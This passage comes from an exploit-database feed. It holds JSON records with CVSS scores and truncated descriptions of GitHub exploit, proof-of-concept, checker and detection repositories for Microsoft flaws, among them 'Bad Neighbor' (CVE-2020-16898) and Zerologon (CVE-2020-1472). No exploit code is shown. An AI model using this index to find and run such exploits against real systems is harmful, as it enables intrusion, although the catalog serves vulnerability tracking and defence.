"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-21T08:58:32", "type": 
"githubexploit", "title": "Exploit for Out-of-bounds Write in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16947"], "modified": "2020-11-25T16:33:09", "id": "B5E5F84A-7647-5D17-9E1D-643518A6A3A9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-27T07:54:39", "description": "# CVE-2020-16947\n\nThis vulnerability occurs in Outlook 2019 (16....", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-15T14:32:25", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16947"], "modified": "2022-07-27T07:12:20", "id": "8B5E018D-C89A-519A-8923-D1E3290A79C8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-09T02:21:08", "description": "# CVE-2020-16938\n\n`CVE-2020-16938` is a vulnerability that allow...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-21T15:38:22", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16938"], "modified": "2022-08-08T19:50:52", "id": "02065E08-7493-5F8F-BA4C-860931D3D2D3", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-16T04:38:35", "description": "# CVE-2020-16898: \u201cBad Neighbor\u201d\r\n\r\n#### CVSS Score: 8.8 \r\n#### ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
"HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-07T19:56:09", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2022-07-16T03:00:39", "id": "92ED250D-4B79-5B70-A5ED-2A55493C90CA", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2020-16898\nPo...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-16T23:03:15", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, 
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2022-02-07T11:30:33", "id": "AB5BA257-13FA-5667-BDBE-A3E1C4658F49", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:53:33", "description": "# CVE-2020-16898\nPoC Ba...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-16T06:27:24", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2020-10-16T11:17:23", "id": "699EB52B-3630-500F-BA12-8F3B95E22A12", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-09T11:37:55", "description": "# CVE-2020-16898\n\nCVE-2020-16898 Windows TCP/IP\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e EXP&...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": 
"HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T11:25:58", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2022-06-09T09:04:58", "id": "803A4C79-0547-5178-A113-233AC5D2498C", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:57:29", "description": "# CVE-2020-16898\nCVE-2020-16898 Windows TCP/IP\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e EXP&P...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-20T05:24:47", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2021-10-10T21:13:40", "id": "60DC34D5-16D7-5E65-8C51-B36123C2EF39", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:57:36", "description": "================================================================...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-14T21:25:09", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2020-10-22T21:12:06", "id": "D7EB3EE2-A5C4-5CC7-B84F-D32CEB99D65A", 
"href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:57:31", "description": "# CVE-2020-16898_Checker\n Check all Network I...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-17T10:23:56", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2020-10-21T17:45:24", "id": "CD749811-2E16-5303-AD4B-1A0DDBCD78A4", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:16:09", "description": "# \"Bad Neighbor\" Detection, CVE-2020-16898 (Windows TCP/IP RCE) ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", 
"version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-14T03:25:00", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2021-10-24T07:13:26", "id": "08C67247-7D33-5943-A7AF-2E9C8989658E", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:53:26", "description": "# CVE-2020-16899: Microsoft Windows TCP/IP Denial of Service Vul...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-12T20:59:03", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16899", "CVE-2020-16898"], "modified": "2021-06-02T02:02:37", "id": "59F9AB6D-E4E2-5EEF-9F2E-2337B7C8D4B9", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:53:22", "description": "Zeek Package for Bad Neighbor Detection\n========================...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-14T16:38:06", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16899", "CVE-2020-16898"], "modified": "2020-10-15T15:39:52", "id": "F9B55BEE-32D1-5654-A978-E27E752E7163", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:53:36", "description": "# This is an educational exercise. 
Use at your own risk.\n\n# CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-10-14T14:42:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350", "CVE-2020-16898"], "modified": "2021-05-17T07:52:28", "id": "C96C8DD1-344C-5476-85AC-6D2865A5C00F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:16:49", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T03:54:27", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in 
Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-19T17:56:42", "id": "FC661572-B96B-5B2C-B12F-E8D279E189BF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-01T15:13:08", "description": "![Python][python-shield]\n\n# CVE-2020-1472\n\nCVE-2020-1472 - Zero ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T07:25:22", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], 
"modified": "2022-04-30T23:21:59", "id": "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:17:29", "description": "# zabbix-template-CVE-2020-1472\nZabbix Template to monitor...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T02:37:52", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-02-08T22:22:05", "id": "12E44744-1AF0-523A-ACA2-593B4D33E014", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-18T04:01:25", "description": "# Ladon Moudle CVE-2020-1472 Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T16:10:21", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-06-18T04:00:40", "id": "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:16:55", "description": "# CVE-2020-1472\nCVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T10:25:47", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-05-12T02:52:15", "id": "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:27:32", "description": "# cve-2020-1472\n\n@[toc](CATALOG)\n# \u6f0f\u6d1e\u539f\u7406\n\u539f\u7406\u6bd4\u8f83\u590d\u6742\uff0c\u6709\u5174\u8da3\u7684\u53ef\u4ee5\u770b\u770b\u4e0b\u9762\u94fe\u63a5\u4e0a\u7684\u6587\u7ae0h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-10T09:00:41", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 